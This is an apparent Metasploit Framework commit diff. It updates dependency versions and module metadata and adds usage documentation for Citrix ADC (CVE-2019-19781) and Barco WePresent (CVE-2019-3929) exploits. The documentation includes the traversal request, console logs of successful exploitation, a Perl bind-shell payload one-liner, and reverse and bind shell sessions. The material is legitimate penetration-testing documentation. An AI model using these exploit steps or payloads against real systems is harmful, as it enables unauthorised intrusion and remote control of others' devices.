automatic module_metadata_base.json update

Moved from exploit/unix/webapp/webmin_backdoor.

Dockerfile

@@ -29,7 +29,7 @@ RUN apk add --no-cache \
       git \
     && echo "gem: --no-document" > /etc/gemrc \
     && gem update --system 3.0.6 \
-    && bundle install --clean --no-cache --system $BUNDLER_ARGS \
+    && bundle install --force --clean --no-cache --system $BUNDLER_ARGS \
     # temp fix for https://github.com/bundler/bundler/issues/6680
     && rm -rf /usr/local/bundle/cache \
     # needed so non root users can read content of the bundle

Gemfile.lock

@@ -1,7 +1,7 @@
 PATH
   remote: .
   specs:
-    metasploit-framework (5.0.67)
+    metasploit-framework (5.0.69)
       actionpack (~> 4.2.6)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)
@@ -117,13 +117,13 @@ GEM
     arel-helpers (2.11.0)
       activerecord (>= 3.1.0, < 7)
     aws-eventstream (1.0.3)
-    aws-partitions (1.260.0)
+    aws-partitions (1.262.0)
     aws-sdk-core (3.86.0)
       aws-eventstream (~> 1.0, >= 1.0.2)
       aws-partitions (~> 1, >= 1.239.0)
       aws-sigv4 (~> 1.1)
       jmespath (~> 1.0)
-    aws-sdk-ec2 (1.129.0)
+    aws-sdk-ec2 (1.130.0)
       aws-sdk-core (~> 3, >= 3.71.0)
       aws-sigv4 (~> 1.1)
     aws-sdk-iam (1.32.0)
@@ -231,7 +231,8 @@ GEM
     nexpose (7.2.1)
     nokogiri (1.10.7)
       mini_portile2 (~> 2.4.0)
-    octokit (4.14.0)
+    octokit (4.15.0)
+      faraday (>= 0.9)
       sawyer (~> 0.8.0, >= 0.5.3)
     openssl-ccm (1.2.2)
     openvas-omp (0.0.4)
@@ -254,7 +255,7 @@ GEM
     pry (0.12.2)
       coderay (~> 1.1.0)
       method_source (~> 0.9.0)
-    public_suffix (4.0.1)
+    public_suffix (4.0.3)
     rack (1.6.12)
     rack-protection (1.5.5)
       rack
@@ -329,12 +330,12 @@ GEM
       rspec-core (~> 3.9.0)
       rspec-expectations (~> 3.9.0)
       rspec-mocks (~> 3.9.0)
-    rspec-core (3.9.0)
-      rspec-support (~> 3.9.0)
+    rspec-core (3.9.1)
+      rspec-support (~> 3.9.1)
     rspec-expectations (3.9.0)
       diff-lcs (>= 1.2.0, < 2.0)
       rspec-support (~> 3.9.0)
-    rspec-mocks (3.9.0)
+    rspec-mocks (3.9.1)
       diff-lcs (>= 1.2.0, < 2.0)
       rspec-support (~> 3.9.0)
     rspec-rails (3.9.0)
@@ -347,7 +348,7 @@ GEM
       rspec-support (~> 3.9.0)
     rspec-rerun (1.1.0)
       rspec (~> 3.0)
-    rspec-support (3.9.0)
+    rspec-support (3.9.2)
     ruby-macho (2.2.0)
     ruby-rc4 (0.1.5)
     ruby_smb (1.1.0)
@@ -379,7 +380,7 @@ GEM
     thread_safe (0.3.6)
     tilt (2.0.10)
     timecop (0.9.1)
-    ttfunk (1.5.1)
+    ttfunk (1.6.1)
     tzinfo (1.2.6)
       thread_safe (~> 0.1)
     tzinfo-data (1.2019.3)
@@ -394,7 +395,7 @@ GEM
       activemodel (>= 4.2.7)
       activesupport (>= 4.2.7)
     xmlrpc (0.3.0)
-    yard (0.9.20)
+    yard (0.9.24)
 
 PLATFORMS
   ruby

LICENSE_GEMS

@@ -10,9 +10,9 @@ afm, 0.2.2, MIT
 arel, 6.0.4, MIT
 arel-helpers, 2.11.0, MIT
 aws-eventstream, 1.0.3, "Apache 2.0"
-aws-partitions, 1.260.0, "Apache 2.0"
+aws-partitions, 1.262.0, "Apache 2.0"
 aws-sdk-core, 3.86.0, "Apache 2.0"
-aws-sdk-ec2, 1.129.0, "Apache 2.0"
+aws-sdk-ec2, 1.130.0, "Apache 2.0"
 aws-sdk-iam, 1.32.0, "Apache 2.0"
 aws-sdk-kms, 1.27.0, "Apache 2.0"
 aws-sdk-s3, 1.60.1, "Apache 2.0"
@@ -53,7 +53,7 @@ loofah, 2.4.0, MIT
 metasm, 1.0.4, LGPL-2.1
 metasploit-concern, 2.0.5, "New BSD"
 metasploit-credential, 3.0.4, "New BSD"
-metasploit-framework, 5.0.67, "New BSD"
+metasploit-framework, 5.0.69, "New BSD"
 metasploit-model, 2.0.4, "New BSD"
 metasploit-payloads, 1.3.83, "3-clause (or ""modified"") BSD"
 metasploit_data_models, 3.0.10, "New BSD"
@@ -69,7 +69,7 @@ net-ssh, 5.2.0, MIT
 network_interface, 0.0.2, MIT
 nexpose, 7.2.1, "New BSD"
 nokogiri, 1.10.7, MIT
-octokit, 4.14.0, MIT
+octokit, 4.15.0, MIT
 openssl-ccm, 1.2.2, MIT
 openvas-omp, 0.0.4, MIT
 packetfu, 1.1.13, BSD
@@ -80,7 +80,7 @@ pg, 0.21.0, "New BSD"
 pg_array_parser, 0.0.9, unknown
 postgres_ext, 3.0.1, MIT
 pry, 0.12.2, MIT
-public_suffix, 4.0.1, MIT
+public_suffix, 4.0.3, MIT
 rack, 1.6.12, MIT
 rack-protection, 1.5.5, MIT
 rack-test, 0.6.3, MIT
@@ -112,12 +112,12 @@ rex-text, 0.2.24, "New BSD"
 rex-zip, 0.1.3, "New BSD"
 rkelly-remix, 0.0.7, MIT
 rspec, 3.9.0, MIT
-rspec-core, 3.9.0, MIT
+rspec-core, 3.9.1, MIT
 rspec-expectations, 3.9.0, MIT
-rspec-mocks, 3.9.0, MIT
+rspec-mocks, 3.9.1, MIT
 rspec-rails, 3.9.0, MIT
 rspec-rerun, 1.1.0, MIT
-rspec-support, 3.9.0, MIT
+rspec-support, 3.9.2, MIT
 ruby-macho, 2.2.0, MIT
 ruby-rc4, 0.1.5, MIT
 ruby_smb, 1.1.0, "New BSD"
@@ -135,7 +135,7 @@ thor, 1.0.1, MIT
 thread_safe, 0.3.6, "Apache 2.0"
 tilt, 2.0.10, MIT
 timecop, 0.9.1, MIT
-ttfunk, 1.5.1, "Nonstandard, GPL-2.0, GPL-3.0"
+ttfunk, 1.6.1, "Nonstandard, GPL-2.0, GPL-3.0"
 tzinfo, 1.2.6, MIT
 tzinfo-data, 1.2019.3, MIT
 warden, 1.2.7, MIT
@@ -144,4 +144,4 @@ websocket-extensions, 0.1.4, "Apache 2.0"
 windows_error, 0.1.2, BSD
 xdr, 2.0.0, "Apache 2.0"
 xmlrpc, 0.3.0, ruby
-yard, 0.9.20, MIT
+yard, 0.9.24, MIT

db/modules_metadata_base.json

@@ -17844,7 +17844,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2019-10-31 13:07:41 +0000",
+    "mod_time": "2020-01-14 00:34:06 +0000",
     "path": "/modules/auxiliary/gather/pulse_secure_file_disclosure.rb",
     "is_install_path": true,
     "ref_name": "gather/pulse_secure_file_disclosure",
@@ -22669,6 +22669,57 @@
     },
     "needs_cleanup": false
   },
+  "auxiliary_scanner/http/citrix_dir_traversal": {
+    "name": "Citrix ADC (NetScaler) Directory Traversal Scanner",
+    "fullname": "auxiliary/scanner/http/citrix_dir_traversal",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2019-12-17",
+    "type": "auxiliary",
+    "author": [
+      "Erik Wynter",
+      "altonjx"
+    ],
+    "description": "This module exploits a directory traversal vulnerability (CVE-2019-19781) within Citrix ADC\n        (NetScaler). It requests the smb.conf file located in the /vpns/cfg directory by issuing the request\n        /vpn/../vpns/cfg/smb.conf. It then checks if the server is vulnerable by looking for the presence of\n        a \"[global]\" directive in smb.conf, which this file should always contain.",
+    "references": [
+      "CVE-2019-19781",
+      "URL-https://support.citrix.com/article/CTX267027/"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2020-01-14 00:25:18 +0000",
+    "path": "/modules/auxiliary/scanner/http/citrix_dir_traversal.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/http/citrix_dir_traversal",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "AKA": [
+        "Shitrix"
+      ]
+    },
+    "needs_cleanup": false
+  },
   "auxiliary_scanner/http/clansphere_traversal": {
     "name": "ClanSphere 2011.3 Local File Inclusion Vulnerability",
     "fullname": "auxiliary/scanner/http/clansphere_traversal",
@@ -51853,6 +51904,80 @@
     },
     "needs_cleanup": null
   },
+  "exploit_linux/http/citrix_dir_traversal_rce": {
+    "name": "Citrix ADC (NetScaler) Directory Traversal RCE",
+    "fullname": "exploit/linux/http/citrix_dir_traversal_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2019-12-17",
+    "type": "exploit",
+    "author": [
+      "Project Zero India",
+      "TrustedSec",
+      "James Brytan",
+      "James Smith",
+      "Marisa Mack",
+      "Rob Vinson",
+      "Sergey Pashevkin",
+      "Steven Laura",
+      "mekhalleh (RAMELLA Sébastien)"
+    ],
+    "description": "This module exploits a directory traversal in Citrix Application Delivery Controller (ADC), aka\n        NetScaler, and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0, to execute an arbitrary command payload.",
+    "references": [
+      "CVE-2019-19781",
+      "EDB-47901",
+      "EDB-47902",
+      "URL-https://support.citrix.com/article/CTX267027/",
+      "URL-https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/"
+    ],
+    "platform": "Python,Unix",
+    "arch": "python, cmd",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Python",
+      "Unix Command"
+    ],
+    "mod_time": "2020-01-14 10:46:04 +0000",
+    "path": "/modules/exploits/linux/http/citrix_dir_traversal_rce.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/citrix_dir_traversal_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "AKA": [
+        "Shitrix"
+      ],
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "needs_cleanup": true
+  },
   "exploit_linux/http/cpi_tararchive_upload": {
     "name": "Cisco Prime Infrastructure Health Monitor TarArchive Directory Traversal Vulnerability",
     "fullname": "exploit/linux/http/cpi_tararchive_upload",
@@ -58777,6 +58902,70 @@
     },
     "needs_cleanup": true
   },
+  "exploit_linux/http/webmin_backdoor": {
+    "name": "Webmin password_change.cgi Backdoor",
+    "fullname": "exploit/linux/http/webmin_backdoor",
+    "aliases": [
+      "exploit/unix/webapp/webmin_backdoor"
+    ],
+    "rank": 600,
+    "disclosure_date": "2019-08-10",
+    "type": "exploit",
+    "author": [
+      "AkkuS",
+      "wvu <wvu@metasploit.com>"
+    ],
+    "description": "This module exploits a backdoor in Webmin versions 1.890 through 1.920.\n        Only the SourceForge downloads were backdoored, but they are listed as\n        official downloads on the project's site.\n\n        Unknown attacker(s) inserted Perl qx statements into the build server's\n        source code on two separate occasions: once in April 2018, introducing\n        the backdoor in the 1.890 release, and in July 2018, reintroducing the\n        backdoor in releases 1.900 through 1.920.\n\n        Only version 1.890 is exploitable in the default install. Later affected\n        versions require the expired password changing feature to be enabled.",
+    "references": [
+      "CVE-2019-15107",
+      "URL-http://www.webmin.com/exploit.html",
+      "URL-https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html",
+      "URL-https://blog.firosolutions.com/exploits/webmin/",
+      "URL-https://github.com/webmin/webmin/issues/947"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, x86, x64",
+    "rport": 10000,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic (Unix In-Memory)",
+      "Automatic (Linux Dropper)"
+    ],
+    "mod_time": "2020-01-14 00:50:04 +0000",
+    "path": "/modules/exploits/linux/http/webmin_backdoor.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/webmin_backdoor",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "needs_cleanup": null
+  },
   "exploit_linux/http/webmin_packageup_rce": {
     "name": "Webmin Package Updates Remote Command Execution",
     "fullname": "exploit/linux/http/webmin_packageup_rce",
@@ -58826,6 +59015,57 @@
     },
     "needs_cleanup": null
   },
+  "exploit_linux/http/wepresent_cmd_injection": {
+    "name": "Barco WePresent file_transfer.cgi Command Injection",
+    "fullname": "exploit/linux/http/wepresent_cmd_injection",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2019-04-30",
+    "type": "exploit",
+    "author": [
+      "Jacob Baines"
+    ],
+    "description": "This module exploits an unauthenticated remote command injection\n        vulnerability found in Barco WePresent and related OEM'ed products.\n        The vulnerability is triggered via an HTTP POST request to the\n        file_transfer.cgi endpoint.",
+    "references": [
+      "CVE-2019-3929",
+      "EDB-46786",
+      "URL-https://medium.com/tenable-techblog/eight-devices-one-exploit-f5fc28c70a7c"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, armle",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix In-Memory",
+      "Linux Dropper"
+    ],
+    "mod_time": "2020-01-14 07:52:30 +0000",
+    "path": "/modules/exploits/linux/http/wepresent_cmd_injection.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/wepresent_cmd_injection",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
   "exploit_linux/http/wipg1000_cmd_injection": {
     "name": "WePresent WiPG-1000 Command Injection",
     "fullname": "exploit/linux/http/wipg1000_cmd_injection",
@@ -80419,7 +80659,7 @@
       "URL-https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/",
       "URL-https://iwantmore.pizza/posts/amsi.html"
     ],
-    "platform": "Linux,PHP,Python,Windows",
+    "platform": "Linux,OSX,PHP,Python,Windows",
     "arch": "",
     "rport": null,
     "autofilter_ports": [
@@ -80435,9 +80675,10 @@
       "Regsvr32",
       "pubprn",
       "PSH (Binary)",
-      "Linux"
+      "Linux",
+      "Mac OS X"
     ],
-    "mod_time": "2019-12-09 11:21:52 +0000",
+    "mod_time": "2020-01-09 15:02:04 +0000",
     "path": "/modules/exploits/multi/script/web_delivery.rb",
     "is_install_path": true,
     "ref_name": "multi/script/web_delivery",
@@ -90423,70 +90664,6 @@
     },
     "needs_cleanup": null
   },
-  "exploit_unix/webapp/webmin_backdoor": {
-    "name": "Webmin password_change.cgi Backdoor",
-    "fullname": "exploit/unix/webapp/webmin_backdoor",
-    "aliases": [
-
-    ],
-    "rank": 600,
-    "disclosure_date": "2019-08-10",
-    "type": "exploit",
-    "author": [
-      "AkkuS",
-      "wvu <wvu@metasploit.com>"
-    ],
-    "description": "This module exploits a backdoor in Webmin versions 1.890 through 1.920.\n        Only the SourceForge downloads were backdoored, but they are listed as\n        official downloads on the project's site.\n\n        Unknown attacker(s) inserted Perl qx statements into the build server's\n        source code on two separate occasions: once in April 2018, introducing\n        the backdoor in the 1.890 release, and in July 2018, reintroducing the\n        backdoor in releases 1.900 through 1.920.\n\n        Only version 1.890 is exploitable in the default install. Later affected\n        versions require the expired password changing feature to be enabled.",
-    "references": [
-      "CVE-2019-15107",
-      "URL-http://www.webmin.com/exploit.html",
-      "URL-https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html",
-      "URL-https://blog.firosolutions.com/exploits/webmin/",
-      "URL-https://github.com/webmin/webmin/issues/947"
-    ],
-    "platform": "Linux,Unix",
-    "arch": "cmd, x86, x64",
-    "rport": 10000,
-    "autofilter_ports": [
-      80,
-      8080,
-      443,
-      8000,
-      8888,
-      8880,
-      8008,
-      3000,
-      8443
-    ],
-    "autofilter_services": [
-      "http",
-      "https"
-    ],
-    "targets": [
-      "Automatic (Unix In-Memory)",
-      "Automatic (Linux Dropper)"
-    ],
-    "mod_time": "2019-08-21 17:42:54 +0000",
-    "path": "/modules/exploits/unix/webapp/webmin_backdoor.rb",
-    "is_install_path": true,
-    "ref_name": "unix/webapp/webmin_backdoor",
-    "check": true,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-      "Stability": [
-        "crash-safe"
-      ],
-      "Reliability": [
-        "repeatable-session"
-      ],
-      "SideEffects": [
-        "ioc-in-logs",
-        "artifacts-on-disk"
-      ]
-    },
-    "needs_cleanup": null
-  },
   "exploit_unix/webapp/webmin_show_cgi_exec": {
     "name": "Webmin /file/show.cgi Remote Command Execution",
     "fullname": "exploit/unix/webapp/webmin_show_cgi_exec",
@@ -118480,7 +118657,7 @@
       "Efmws 5.3 Universal",
       "Efmws 4.0 Universal"
     ],
-    "mod_time": "2018-07-12 17:34:52 +0000",
+    "mod_time": "2020-01-05 21:39:34 +0000",
     "path": "/modules/exploits/windows/http/efs_fmws_userid_bof.rb",
     "is_install_path": true,
     "ref_name": "windows/http/efs_fmws_userid_bof",
@@ -136744,7 +136921,7 @@
       "Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)",
       "Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - AWS)"
     ],
-    "mod_time": "2019-10-30 22:20:36 +0000",
+    "mod_time": "2020-01-12 08:19:44 +0000",
     "path": "/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb",
     "is_install_path": true,
     "ref_name": "windows/rdp/cve_2019_0708_bluekeep_rce",

documentation/modules/auxiliary/scanner/http/citrix_dir_traversal.md

@@ -0,0 +1,57 @@
+## Introduction
+
+An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. The vulnerability, tracked as CVE-2019-19781, allows for directory traversal. If exploited, it could allow an unauthenticated attacker to perform arbitrary code execution.
+
+Because vulnerable servers allow for directory traversal, they will accept the request `GET /vpn/../vpns/` and process it as a request for `GET /vpns/`, a directory that contains PERL scripts that can be targeted to allow for limited file writing on the vulnerable host.
+
+This module checks if a target server is vulnerable by issuing an HTTP GET request for `/vpn/../vpns/cfg/smb.conf`and then checking the response for `[global]` since this configuration file should contain global variables. If `[global]` is found, the server is vulnerable to CVE-2019-19781.
+
+## Verification Steps
+
+1. Install the module as usual
+2. Start msfconsole
+3. Do: `use auxiliary/scanner/http/citrix_dir_traversal`
+4. Do: `set RHOSTS [IP]`
+5. Do: `run`
+
+## Options
+
+1. `Proxies`. This option is not set by default.
+2. `RPORT`. The default setting is `80`. To use: `set RPORT [PORT]`
+3. `SSL`. The default setting is `false`.
+4. `THREADS`. The default setting is `1`.
+5. `VHOST`. This option is not set by default.
+6. `TARGETURI`. This option is the base path. `/` by default.
+7. `PATH`. This option is the traversal path. `/vpn/../vpns/cfg/smb.conf` by default.
+
+## Scenarios
+
+```
+msf5 auxiliary(scanner/http/citrix_dir_traversal) > options
+
+Module options (auxiliary/scanner/http/citrix_dir_traversal):
+
+   Name       Current Setting            Required  Description
+   ----       ---------------            --------  -----------
+   PATH       /vpn/../vpns/cfg/smb.conf  yes       Traversal path
+   Proxies                               no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     127.0.0.1                  yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      8080                       yes       The target port (TCP)
+   SSL        false                      no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                          yes       Base path
+   THREADS    1                          yes       The number of concurrent threads (max one per host)
+   VHOST                                 no        HTTP server virtual host
+
+msf5 auxiliary(scanner/http/citrix_dir_traversal) > run
+
+[+] http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf - The target is vulnerable to CVE-2019-19781.
+[+] Obtained HTTP response code 200 for http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf. This means that access to /vpn/../vpns/cfg/smb.conf was obtained via directory traversal.
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf5 auxiliary(scanner/http/citrix_dir_traversal) >
+```
+
+## References
+
+1. <https://nvd.nist.gov/vuln/detail/CVE-2019-19781>
+2. <https://support.citrix.com/article/CTX267027>

documentation/modules/exploit/linux/http/citrix_dir_traversal_rce.md

@@ -0,0 +1,76 @@
+## Introduction
+
+A directory traversal was discovered in Citrix Application Delivery Controller (ADC), aka NetScaler, and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0.
+
+When the NSPPE receives a request for `GET /vpn/index.html`, it is supposed to send this request to Apache, which processes it. However, by making the request `GET /vpn/../vpns/` (which is not sanitized), Apache transforms the route into `GET /vpns/` and processes this last request normally.
+
+This `/vpns/` directory is interesting because it contains Perl code. The script `newbm.pl` creates an array containing information from several parameters, then calls the `filewrite` function, which writes the content to an XML file on disk.
+
+A malicious attacker can execute arbitrary commands remotely by creating a corrupted XML file that uses the Perl Template Toolkit in part of payload.
+
+```
+msf5 exploit(linux/http/citrix_dir_traversal_rce) > run
+
+[*] Using auxiliary/scanner/http/citrix_dir_traversal as check
+[+] http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf - The target is vulnerable to CVE-2019-19781.
+[+] Obtained HTTP response code 200 for http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf. This means that access to /vpn/../vpns/cfg/smb.conf was obtained via directory traversal.
+[*] Scanned 1 of 1 hosts (100% complete)
+[+] The target appears to be vulnerable
+[*] Yeeting cmd/unix/generic payload at 127.0.0.1:8080
+[*] Generated payload: id
+uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
+
+[!] This exploit may require manual cleanup of '/netscaler/portal/templates/mdjLHiHtIYmh.xml' on the target
+[!] This exploit may require manual cleanup of '/var/tmp/netscaler/portal/templates/mdjLHiHtIYmh.xml.ttc2' on the target
+[*] Exploit completed, but no session was created.
+msf5 exploit(linux/http/citrix_dir_traversal_rce) > set payload cmd/unix/bind_perl
+payload => cmd/unix/bind_perl
+msf5 exploit(linux/http/citrix_dir_traversal_rce) > run
+
+[*] Using auxiliary/scanner/http/citrix_dir_traversal as check
+[+] http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf - The target is vulnerable to CVE-2019-19781.
+[+] Obtained HTTP response code 200 for http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf. This means that access to /vpn/../vpns/cfg/smb.conf was obtained via directory traversal.
+[*] Scanned 1 of 1 hosts (100% complete)
+[+] The target appears to be vulnerable
+[*] Yeeting cmd/unix/bind_perl payload at 127.0.0.1:8080
+[*] Generated payload: perl -MIO -e '$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};'
+[!] No response to GET KdlZHSNjZQzdSCKAusgAnnbPvTMLhXRxiEydEotJP.xml request
+[*] Started bind TCP handler against 127.0.0.1:4444
+[*] Command shell session 1 opened (127.0.0.1:51106 -> 127.0.0.1:4444) at 2020-01-13 20:50:45 -0600
+[+] Deleted /netscaler/portal/templates/KdlZHSNjZQzdSCKAusgAnnbPvTMLhXRxiEydEotJP.xml
+[+] Deleted /var/tmp/netscaler/portal/templates/KdlZHSNjZQzdSCKAusgAnnbPvTMLhXRxiEydEotJP.xml.ttc2
+
+id
+uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
+```
+
+## Verification Steps
+
+1. Install the module as usual
+2. Start msfconsole
+3. Do: `use exploit/linux/http/citrix_dir_traversal_rce`
+4. Do: `set RHOSTS [IP]`
+5. Do: `set LHOST [IP]`
+6. Do: `set VERBOSE true`
+7. Do: `run`
+
+## Targets
+
+```
+Id  Name
+--  ----
+0   Python
+1   Unix Command
+```
+
+## Advanced options
+
+**ForceExploit**
+
+Override check result.
+
+## References
+
+1. <https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/>
+2. <https://www.exploit-db.com/exploits/47901>
+3. <https://www.exploit-db.com/exploits/47902>

documentation/modules/exploit/linux/http/webmin_backdoor.md

@@ -78,7 +78,7 @@ Set this to `true` to override the `check` result during exploitation.
 ## Usage
 
 ```
-msf5 exploit(unix/webapp/webmin_backdoor) > run
+msf5 exploit(linux/http/webmin_backdoor) > run
 
 [*] Started reverse TCP handler on 172.28.128.1:4444
 [*] Webmin 1.890 detected
@@ -95,9 +95,9 @@ uname -a
 Linux ubuntu-xenial 4.4.0-141-generic #167-Ubuntu SMP Wed Dec 5 10:40:15 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
 ^Z
 Background session 1? [y/N]  y
-msf5 exploit(unix/webapp/webmin_backdoor) > set target 1
+msf5 exploit(linux/http/webmin_backdoor) > set target 1
 target => 1
-msf5 exploit(unix/webapp/webmin_backdoor) > run
+msf5 exploit(linux/http/webmin_backdoor) > run
 
 [*] Started reverse TCP handler on 172.28.128.1:4444
 [*] Webmin 1.890 detected

documentation/modules/exploit/linux/http/wepresent_cmd_injection.md

@@ -0,0 +1,96 @@
+## Vulnerable Application
+
+This module exploits [CVE-2019-3929](https://nvd.nist.gov/vuln/detail/CVE-2019-3929). The vulnerability affects [WePresent](https://www.barco.com/en/page/wepresent) devices, as well as many OEM devices (listed below). The vulnerability is an unauthenticated remote command injection via HTTP POST request to the /cgi-bin/file_transfer.cgi endpoint. 
+
+The following devices are known to be affected by this issue:
+
+* Barco wePresent WiPG-1000P <= 2.3.0.10
+* Barco wePresent WiPG-1600W <= 2.4.1.19
+* Crestron AM-100 <= 1.6.0.2
+* Crestron AM-101 <= 2.7.0.1
+* Extron ShareLink 200/250 <= 2.0.3.4
+* Teq AV IT WIPS710 <= 1.1.0.7
+* InFocus LiteShow3 <= 1.0.16
+* InFocus LiteShow4 <= 2.0.0.7
+* Optoma WPS-Pro <= 1.0.0.5
+* Blackbox HD WPS <= 1.0.0.5
+* SHARP PN-L703WA <= 1.4.2.3
+
+## Verification Steps
+
+  1. Acquire one of the vulnerable devices.
+  2. Start msfconsole
+  3. Do: `use exploit/linux/http/wepresent_cmd_injection`
+  4. Do: `set RHOSTS <device ip>`
+  5. Do: `check`
+  6. The module should indicate if the target is vulnerable or not.
+  7. Do: `set LHOST <ip>`
+  8. Do: run
+  9. A meterpreter session should be started
+
+## Scenarios
+
+### Tested against Crestron AM-100 1.6.0.2 
+
+#### Meterpreter
+
+```
+msf5 > use exploit/linux/http/wepresent_cmd_injection 
+msf5 exploit(linux/http/wepresent_cmd_injection) > set RHOSTS 10.12.70.246
+RHOSTS => 10.12.70.246
+msf5 exploit(linux/http/wepresent_cmd_injection) > set LHOST 10.12.70.238
+LHOST => 10.12.70.238
+msf5 exploit(linux/http/wepresent_cmd_injection) > check
+[+] 10.12.70.246:443 - The target is vulnerable.
+msf5 exploit(linux/http/wepresent_cmd_injection) > run
+
+[*] Started reverse TCP handler on 10.12.70.238:4444 
+[*] Command Stager progress -   9.95% done (127/1276 bytes)
+[*] Command Stager progress -  19.98% done (255/1276 bytes)
+[*] Command Stager progress -  29.94% done (382/1276 bytes)
+[*] Command Stager progress -  39.97% done (510/1276 bytes)
+[*] Command Stager progress -  50.00% done (638/1276 bytes)
+[*] Command Stager progress -  59.95% done (765/1276 bytes)
+[*] Command Stager progress -  69.75% done (890/1276 bytes)
+[*] Command Stager progress -  79.62% done (1016/1276 bytes)
+[*] Command Stager progress -  89.50% done (1142/1276 bytes)
+[*] Sending stage (904600 bytes) to 10.12.70.246
+[*] Command Stager progress - 100.08% done (1277/1276 bytes)
+[*] Command Stager progress - 101.33% done (1293/1276 bytes)
+[*] Meterpreter session 1 opened (10.12.70.238:4444 -> 10.12.70.246:40805) at 2020-01-09 05:53:34 -0500
+
+meterpreter > shell
+Process 31774 created.
+Channel 1 created.
+uname -a
+Linux Crestron.AirMedia-1.1.wm8750 2.6.32.9-default #30 Wed Jul 12 13:56:45 CST 2017 armv6l GNU/Linux
+```
+
+#### Busybox/Telnetd Bind Shell
+
+```
+msf5 > use exploit/linux/http/wepresent_cmd_injection 
+msf5 exploit(linux/http/wepresent_cmd_injection) > set target 0
+target => 0
+msf5 exploit(linux/http/wepresent_cmd_injection) > set payload cmd/unix/bind_busybox_telnetd 
+payload => cmd/unix/bind_busybox_telnetd
+msf5 exploit(linux/http/wepresent_cmd_injection) > set RHOSTS 10.12.70.246
+RHOSTS => 10.12.70.246
+msf5 exploit(linux/http/wepresent_cmd_injection) > set LHOST 10.12.70.238
+LHOST => 10.12.70.238
+msf5 exploit(linux/http/wepresent_cmd_injection) > check
+[+] 10.12.70.246:443 - The target is vulnerable.
+msf5 exploit(linux/http/wepresent_cmd_injection) > run
+
+[*] Started bind TCP handler against 10.12.70.246:4444
+[*] Command shell session 1 opened (10.12.70.238:41457 -> 10.12.70.246:4444) at 2020-01-09 05:56:36 -0500
+
+whoami
+whoami
+root
+~/boa/cgi-bin # uname -a
+uname -a
+Linux Crestron.AirMedia-1.1.wm8750 2.6.32.9-default #30 Wed Jul 12 13:56:45 CST 2017 armv6l GNU/Linux
+~/boa/cgi-bin # 
+```
+

